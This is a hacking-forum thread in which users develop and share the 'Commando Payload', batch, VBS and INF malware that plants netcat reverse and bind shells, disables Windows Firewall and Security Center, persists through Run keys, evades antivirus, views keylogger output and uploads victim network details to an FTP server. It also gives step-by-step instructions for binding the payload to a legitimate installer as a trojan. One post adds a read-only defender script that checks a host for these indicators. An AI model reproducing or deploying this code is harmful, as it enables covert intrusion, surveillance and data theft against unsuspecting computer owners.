sablefoxx Posted December 1, 2007

This is in response to this thread: http://forums.hak5.org/index.php/topic,7971.0.html

See latest post for v3.0 Beta / Java's Method v2

Current stable release: 2.2

What it does: gives you a reverse shell on a computer. It comes in two flavors: my switchblade-style attack, and Javabudd's exe bind method. Both have the same features.

Sable's Method

How to use:
  1. Infect target computer with payload
  2. Go to your computer
  3. Connect to victim's computer with a reverse shell :)  nc.exe [host] [port]

To connect, use nc.exe from BiN or DL the full version here - Netcat

Commando Payload:
  [*] U3 / Non-U3 compatible
  [*] Copies nc.exe onto computer and runs it on port 69
  [*] If autoexec.bat exists it will add itself into it
  [*] Completely stealthed
  [*] Automatic Windows Firewall kill and Security Center disable
  [*] Uses hidec.exe, not nircmd.exe, to avoid anti-virus
  [*] Cleaner.bat to remove payload *See below for updated code*
  [*] Removes Windows Firewall from Ctrl Panel (requires reboot)
  [*] Autoruns at startup using a regkey - (thx to Javabudd)
  [*] Added -t so you can telnet to victim - (thx to Javabudd)
  [*] Ctrl+Alt+Del resistant - (thx to Javabudd)

Upcoming add-ons:
  [*] Bypass NAT (see Java's Method v2)
  [*] U3 Vista port (coming soon to Cmdo v3)

Enjoy, let me know if there are problems, hit me up on AIM (sablefoxx121) with questions.

Javabudd's Method

Binds nc.exe and some script to a legit installer (magicISO), so when you run the installer it not only installs magicISO but the payload as well.

------------------------------------------------------------
Download Commando Payload Here (SiZE:81Kb - File:RAR - NonU3) Commando Payload 2.2
Download Commando Payload Here (SiZE:151Kb - File:ISO - U3) Commando Payload 2.2
Download Java's Method Here (SiZE:3Mb - File:EXE - WinXP/Vista) Java's Method v1.0
============================================================

Feel free to add/mod/hack this code all you want! -- MAD props to javabudd, v2 kicks ass
Xqtftqx Posted December 1, 2007

Holy shit, nice dude. I did one with netcat last night; it just runs it. This is awesome. Mad props dude. This is definitely going in my payload.
sablefoxx (Author) Posted December 1, 2007

OK, updated the payload. It should auto-disable Windows' firewall, kill Security Center, and add nc.exe to the exceptions list in case they turn the firewall back on. Let me know if there are problems, as I didn't get a good chance to test everything. Any ideas on how to bypass NAT? -- Maybe auto-join a VPN?
javabudd Posted December 1, 2007

I've got a perfect iexpress installer that I made that throws NC into %sys32%, and with the switches -L and -d netcat stays open even if they ctrl-alt-del it. And I'm also trying to add something that adds a registry key to HKLM/microsoft/windows/currentversion/run; anything in that key is run on startup with no questions asked and runs perfectly stealthed :D
sablefoxx (Author) Posted December 1, 2007

> I've got a perfect iexpress installer that I made that throws NC into %sys32%, and with the switches -L and -d netcat stays open even if they ctrl-alt-del it. And I'm also trying to add something that adds a registry key to HKLM/microsoft/windows/currentversion/run; anything in that key is run on startup with no questions asked and runs perfectly stealthed :D

Hot! Send me the code when it's done!
javabudd Posted December 1, 2007

**Edit** I changed the cabinet installer to put a directory in the Windows folder named Attreb. Inside this folder is nc and all that shit. The only problem I'm having right now is adding this key to the registry so it auto-runs nc -L -d -p 69 -e cmd.exe. I'm using INF files; anyone have any ideas?
javabudd Posted December 2, 2007

I got this installer perfected. Here's the link: http://www.mediafire.com/?5i1ljjy9xcj. In the RAR is the fake MagicISO installer and the INF file I made. Read through the INF, then you will understand what happens when you execute the installer. Happy Hacking!
sablefoxx (Author) Posted December 2, 2007

Updated payload to v2, look at the above post for details!! Here is the cleaner.bat code to remove the payload v2.2:

    @echo off
    cls
    taskkill /f /im nc.exe
    cd C:\WINDOWS\system32
    del /f /q start.bat
    del /f /q stop.bat
    del /f /q hidec.exe
    del /f /q nc.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Attreb /f
    reg delete "HKCU\Control Panel\don't load" /v Firewall.cpl /f
    msg * "system clean"
    exit
javabudd Posted December 2, 2007

Shout out to sable and his switchblade :D. If anyone has any ideas on what we should add, let us know and we will try and implement them... commando payload v2 = GG
underhole Posted December 2, 2007

Tested it today, it works like magic. Another great payload from Sable.
sablefoxx (Author) Posted December 3, 2007

Cmdo Payload v3.0 Development

Current state of Commando Payload 3.0 Beta:
  [*] U3 / Non-U3 compatible
  [*] Completely stealthed
  [*] Keylogger with real-time feedback (rtk.bat) *New, works but buggy*
  [*] Runs reverse shell on port 69
  [*] Easy-to-use connect-to-victim script *New*
  [*] Automatic Windows Firewall kill and Security Center disable *Fixed*
  [*] Uses hidec.exe, not nircmd.exe, to avoid anti-virus
  [*] Cleaner.bat to remove payload *Updated for v3.0*
  [*] Removes Windows Firewall from Ctrl Panel *Fixed*
  [*] Autoruns at startup using a regkey *Not working, needs fix*
  [*] Commented code *New*
  [*] Records ipconfig to txt in Logs dir *New*
  [*] Won't run if C:\safety.txt exists *New*
  [*] NAT traversal, connect through routers *New, only works in Java's Method so far*
  [*] Added -t so you can telnet to victim

-- Everything is almost working, but before it gets released as the main payload I would like some people to test it, throw me some ideas on other things to add, and review my code and fix it, hehe.

--- Codez ---

Magik.bat - script that installs the payload:

    @echo off
    cls
    :: Test for safty.txt
    IF EXIST C:\safty.txt goto exit
    :: Test to see if payload is already installed
    IF EXIST C:\WINDOWS\system32\nc.exe goto exit
    :: Test to see if there is a logs dir (Non-U3 only)
    IF NOT EXIST Logs goto mklog
    :1
    :: Reg1 = Startup Key
    :: Reg2 = Disables Firewall in Ctrl Panel
    reg import "reg1.reg"
    reg import "reg2.reg"
    :: First poke a hole in window's firewall so that it will allow nc.exe
    hidec /w stop.bat
    :: Move files to location and run
    xcopy /y /s .\BiN %systemroot%\system32
    :: Make log (Non-U3 Only)
    ipconfig /all>>.\Logs\%computername%.txt
    :: Start Payload
    cd C:\WINDOWS\system32
    start k.exe
    hidec nc.exe -l -t -p 69 -d -e cmd.exe
    goto exit
    :mklog
    mkdir Logs
    goto 1
    :exit
    exit

connect.bat - easy way to connect to the victim, for the people out there who don't know what "nc.exe [host] [port]" means:

    :setup
    @echo off
    cls
    title Auto-NConnect
    IF NOT EXIST nc.exe goto error
    IF NOT EXIST makefile goto error
    goto 1
    :1
    echo.
    echo ╔══════════════════════════════════════╗
    echo ║        Welcome to SableFoXx's        ║
    echo ║            Auto-NConnect             ║
    echo ╚══════════════════════════════════════╝
    echo.
    set /p target= Input IP of Target:
    echo.
    set /p port= Input Port (default 69):
    cls
    title Reverse Shell Open
    goto connect
    :connect
    nc.exe %target% %port%
    :error
    cls
    color c
    echo BAD BLAK MAGiC, TRY AGAiN
    pause
    exit

stop.bat - stops Windows Firewall and Security Center:

    @echo off
    cls
    net stop "security center"
    net stop "Windows Firewall/Internet Connection Sharing (ICS)"
    exit

Real-time keylogger view (still buggy)

Usage of rtk.bat: connect to host, go to %systemroot%\system32 and start rtk.bat. Basically it displays the keylogger's log file and refreshes it. Working on a .html version that should work better than the current one.

rtk.bat:

    @echo off
    :1
    :: clear screen
    cls
    :: display text in log
    type C:\WINDOWS\system32\log.txt
    :: pause before refresh
    REM ******PAUSE******
    set wait=0
    :pause1
    set /a wait=%wait%+1
    if %wait% neq 250 goto :pause1
    REM *****************
    :: repeat/refresh
    goto 1

Enjoy, let me know if there are problems, hit me up on AIM (sablefoxx121) with questions.

------------------------------------------------------------
Download Commando Payload Here (SiZE:175Kb - File:RAR - NonU3) Commando Payload 3.0 - Beta
============================================================

Please post code fixes, new ideas, and anything on your mind.
javabudd Posted December 4, 2007

HEY sable, you're gonna like this one. I finally was able to incorporate a method to send their IP information. I created a few proggys to ipconfig /all the comp and create a text file ipaddr.txt in the sys32 directory. The other progy automatically connects to my ftp (no username or password needed because it's already in the script :D) and uploads ipaddr.txt. This whole process takes about 1.3 seconds. Talk to me on aim if u want the code; I can't give it away here cuz it has my ftp info :/ Oh btw, you can scratch "get External IP" from upcoming additions :D
javabudd Posted December 4, 2007

Java v2.0

Current progress on Java Installer Payload v2.0
  [*] Completely stealthed
  [*] Bound to aim.exe (or any .exe installer you like)
  [*] Reverse shell on port 69
  [*] WORKS EVEN IF VICTIM HAS A ROUTER
  [*] Implements an ipconfig /all > %computername%.txt
  [*] Uploads "%computername%.txt" to an FTP server (I am going to include the code but with my FTP info taken out)
  [*] hidden.vbs and nircmd.exe used to never open up a cmd window (installation and execution of nc.exe is never displayed)
  [*] WILL EXPLAIN SETUP.INF AND INSTALLATION FURTHER DOWN
  [*] And last but hopefully not the least, anti-virus does not pick up any of it. :D:D

Teh Codez

jvabd.bat:

    @echo off
    :: Executing IPCONFIG and creating .txt
    ipconfig /all > c:\Windows\System32\%Computername%.txt
    cls
    :: Executing Script to send ipaddr to ftp :D
    CALL .\hidden.vbs script.bat
    :: Quitting
    GOTO End
    :End

hidden.vbs:

    CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

script.bat (MAKE SURE YOU EDIT THE NECESSARY FIELDS):

    @ECHO OFF
    :: Create the temporary script file
    > script.ftp ECHO USER YOURUSERNAME
    >>script.ftp ECHO PASSWORD
    >>script.ftp ECHO binary
    >>script.ftp ECHO prompt n
    >>script.ftp ECHO put "C:\Windows\System32\%computername%.txt"
    >>script.ftp ECHO QUIT
    ::Connect to the ftp and run the script
    FTP -v -s:script.ftp FTPSERVER
    :: Overwriting the temp script so this never happened :D
    TYPE NUL >script.ftp
    DEL script.ftp
    EXIT

Setup.inf (MAKE SURE YOU EDIT THE NECESSARY FIELDS):

    ; This INF File will install netcat in the TARGET system32 directory and implement the following command
    ; "nc.exe -e cmd.exe 0.0.0.0 69"; where 0.0.0.0 is YOUR EXTERNAL ip address
    ; After the installation a registry key will be added on the victims computer to connect to 0.0.0.0 69
    ; any time you create a listen server on your computer
    ; Lets Begin:

    [Version]
    Signature="$Chicago$"
    AdvancedINF=2.0

    [DefaultInstall]
    Copyfiles=install.files
    Copyfiles=installer.files
    RunPostSetupCommands=RunPostSetupCommandsSection
    AddReg=Add.Settings

    [DestinationDirs]
    ; If you are using a different .exe installer switch the directory HERE
    install.files=30,/Windows/System32
    installer.files=30,/Program Files/AOL Instant Messenger

    [install.files]
    ; These are the pwnage programs that will be installed into system32
    jvabd.bat   ; ipconfig /all txt creator
    script.bat  ; autoconnect to ftp and upload ipconfig txt :D
    nc.exe      ; netcat of course
    nircmd.exe  ; hides cmd window
    hidden.vbs  ; hides cmd window while executing a batch in a batch
    setup.inf   ; inf file

    [installer.files]
    ; The aim installer that installs into /program files/aol instant messenger ;)
    ; TO ADD DIFFERENT .EXE INSTALLERS REMOVE AIM.EXE AND REPLACE WITH YOUR.EXE
    aim.exe

    [Add.Settings]
    ; Adding registry key to make nc run on boot :D
    ; Input your IP address into 0.0.0.0 and make sure you have port 69 forwarded to receive the reverse shell :D
    HKLM,Software\Microsoft\Windows\CurrentVersion\Run,WinUpdate,0x00000000,"C:\Windows\System32\nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69"

    [RunPostSetupCommandsSection]
    ; Programs are going to be listed in order of execution, including parameters (nc :D):
    ; ONCE AGAIN CHANGE 0.0.0.0 TO YOUR EXTERNAL IP
    ; If you have a different .exe installer replace aim.exe with your.exe once again
    nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69
    nircmd.exe execmd CALL jvabd.bat
    aim.exe

    [SourceDiskNames]
    1="default",,1

Instructions on creating the installer

Once you have created the jvabd.bat, hidden.vbs, script.bat and setup.inf, it's time to compile these programs into one cabinet .exe installer. Create a folder and name it whatever the fuck you want, and inside this folder include the following things: nc.exe, nircmd.exe, jvabd.bat, script.bat, setup.inf, hidden.vbs, and the installer of your choice. Don't worry: when you run the compiled version only the installer is shown, everything else gets stealth installed.

Now, when you have these 7 things inside a folder, it's time to compile them into one. *Note* I have not found a method of doing this on Linux or Mac yet, being as they don't use .exe's.

  1. Click Start - Run - iexpress.exe. Choose "Create new...", then click on "Extract files then run an installation command".
  2. Create a package title (I did AIM 5.9.8), then decide whether or not u want a confirmation message (This will install blah blah, are you sure?).
  3. Next, skip the license crap and you will see "Package Files". Click Add, browse to your folder with the pwnage in it, and add all 7 items (including your.exe installer).
  4. Click Next. On the next screen under "Install Program" choose SETUP.INF, not YOUR.EXE INSTALLER, and leave the post-install command.
  5. Click Next, leave the show window setting at recommended, click Next, create a finished message if you like.
  6. Click Next, name your installer.exe and choose the place you want to save it; also check "Hide file extracting progress animation from user".
  7. Choose no restart, and on the next screen save your project if you want.
  8. Click Next, create the package, and you now have a legit installer that includes pwnage :D.

**IF YOU USE THIS AND GET FUCKED IT'S NOT MY FAULT**
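As an added defender-side check (this is not code from the thread or from either author), the PowerShell script below looks for the artifacts the two variants described in this thread leave on a host: the files cleaner.bat deletes and Magik.bat/Setup.inf copy into System32, the Run-key values named Attreb and WinUpdate, the Firewall.cpl entry under the "don't load" key, the two services stop.bat stops, and a listener on TCP 69. File names, key names and service display names are taken from the posted scripts; the assumption that these are the only artifacts is mine, so treat a clean result as "none of the posted indicators", not "nothing present". The script only reads; it removes nothing.

```powershell
# Added example, not part of the original thread. Checks a Windows host for the
# indicators of the Commando Payload / Java's Method scripts posted above.
# Run from an elevated PowerShell prompt. Read-only: reports, does not clean.

$sys32 = Join-Path $env:SystemRoot 'System32'
$findings = @()

# 1. Files dropped into System32 (names from cleaner.bat, Magik.bat, rtk.bat, Setup.inf).
$droppedFiles = 'nc.exe', 'hidec.exe', 'start.bat', 'stop.bat', 'k.exe', 'log.txt',
                'nircmd.exe', 'jvabd.bat', 'script.bat', 'hidden.vbs', 'script.ftp',
                ("{0}.txt" -f $env:COMPUTERNAME)
foreach ($f in $droppedFiles) {
    $p = Join-Path $sys32 $f
    if (Test-Path -LiteralPath $p) { $findings += "Dropped file present: $p" }
}

# 2. Persistence: Run-key values named in the thread (Attreb, WinUpdate), plus any
#    Run-key value whose command references nc.exe or nircmd.
$runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
if (Test-Path -LiteralPath $runKey) {
    $run = Get-ItemProperty -LiteralPath $runKey
    foreach ($prop in $run.PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }   # skip provider metadata properties
        $val = [string]$prop.Value
        if (($prop.Name -in @('Attreb', 'WinUpdate')) -or ($val -match 'nc\.exe|nircmd')) {
            $findings += "Run key value '$($prop.Name)' = $val"
        }
    }
}

# 3. Firewall applet hidden from Control Panel via the "don't load" key.
$dontLoad = "HKCU:\Control Panel\don't load"
if (Test-Path -LiteralPath $dontLoad) {
    $dl = Get-ItemProperty -LiteralPath $dontLoad
    if ($dl.PSObject.Properties.Name -contains 'Firewall.cpl') {
        $findings += "Firewall.cpl is suppressed under '$dontLoad'"
    }
}

# 4. Services that stop.bat shuts down, matched by display name as that script does.
foreach ($name in 'Security Center', 'Windows Firewall/Internet Connection Sharing (ICS)') {
    $svc = Get-Service -DisplayName $name -ErrorAction SilentlyContinue
    if ($svc -and $svc.Status -ne 'Running') {
        $findings += "Service '$name' is $($svc.Status)"
    }
}

# 5. Listener on TCP 69 (the port both variants use) and the process behind it.
$listeners = netstat -ano -p tcp | Select-String ':69\s+\S+\s+LISTENING\s+(\d+)'
foreach ($m in $listeners) {
    $listenPid = [int]$m.Matches[0].Groups[1].Value
    $proc = Get-Process -Id $listenPid -ErrorAction SilentlyContinue
    $findings += "TCP 69 listener: PID $listenPid ($($proc.ProcessName))"
}

if ($findings.Count -eq 0) {
    'No Commando Payload indicators found.'
} else {
    $findings | ForEach-Object { "[!] $_" }
}
```

A hit on the Run key or on the TCP 69 listener is the strongest signal, since the dropped file names and the stopped services can have benign explanations; cleaner.bat posted earlier in the thread is the matching removal step for Sable's variant, and the Setup.inf above lists what Java's variant installs.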
javabudd Posted November 19, 2009

Wow sable, I'm so glad this forum is still up!! I formatted my comp and forgot to back up all this shit, but thankfully it's here. <3
Jen Posted November 19, 2009

Can someone give me a more clear explanation in noob terms on what this does?
Jen Posted March 3, 2010

Hey sablefox, do you still work on this project?
sablefoxx (Author) Posted March 3, 2010 (edited)

As it just so happens, me and Javabudd recently resumed working on that project. Nothing to release just yet, but here are a few features of the new version:
  - GUI interface (command line as well)
  - Silent install option
  - Auto bypass router
  - Emails external IP/info
  - Customize each install using GUI
  - Built-in tools (such as wget)
  - Option to install FTP server
  - Even more

As always, when it's done I'll post all the source for everyone to play around with. :)

Edited March 3, 2010 by sablefoxx
Jen Posted March 3, 2010

Wow, looks great!! Any updates on virus undetection? Like making the tool FUD? And U3 too?
sablefoxx (Author) Posted March 3, 2010

Could do a U3 version easily. Been mulling over compiling my own version of NetCat to attempt avoiding AV detection, or even possibly coding my own in Python... not sure just yet, all in due time methinks.
Jen Posted March 3, 2010

OK, thanks a lot! Will you be finished before April 1st?? Cause I'm going to test things during spring break :P
sablefoxx (Author) Posted March 19, 2010

> OK, thanks a lot! Will you be finished before April 1st?? Cause I'm going to test things during spring break :P

I will see if I can get something together by then; however, I regret to inform everyone there has been a slight setback... I have obtained a Starcraft 2 Beta Key... :)
Jen Posted March 19, 2010

> I will see if I can get something together by then; however, I regret to inform everyone there has been a slight setback... I have obtained a Starcraft 2 Beta Key... :)

Haha, okay. I understand :)
X3N Posted March 19, 2010

I've been away for a while, but I wouldn't mind getting back into developing new and improved switchblades... let me know if there's anything in particular that I can do to help... otherwise I'll just start hackin'.
thedadymac Posted March 21, 2010

Hi, I was wondering what I would have to change in the code to allow me to connect to the "victim" over the internet instead of over a LAN.
Jen Posted March 21, 2010

I think it does allow you to connect over the internet, as long as they don't have a router.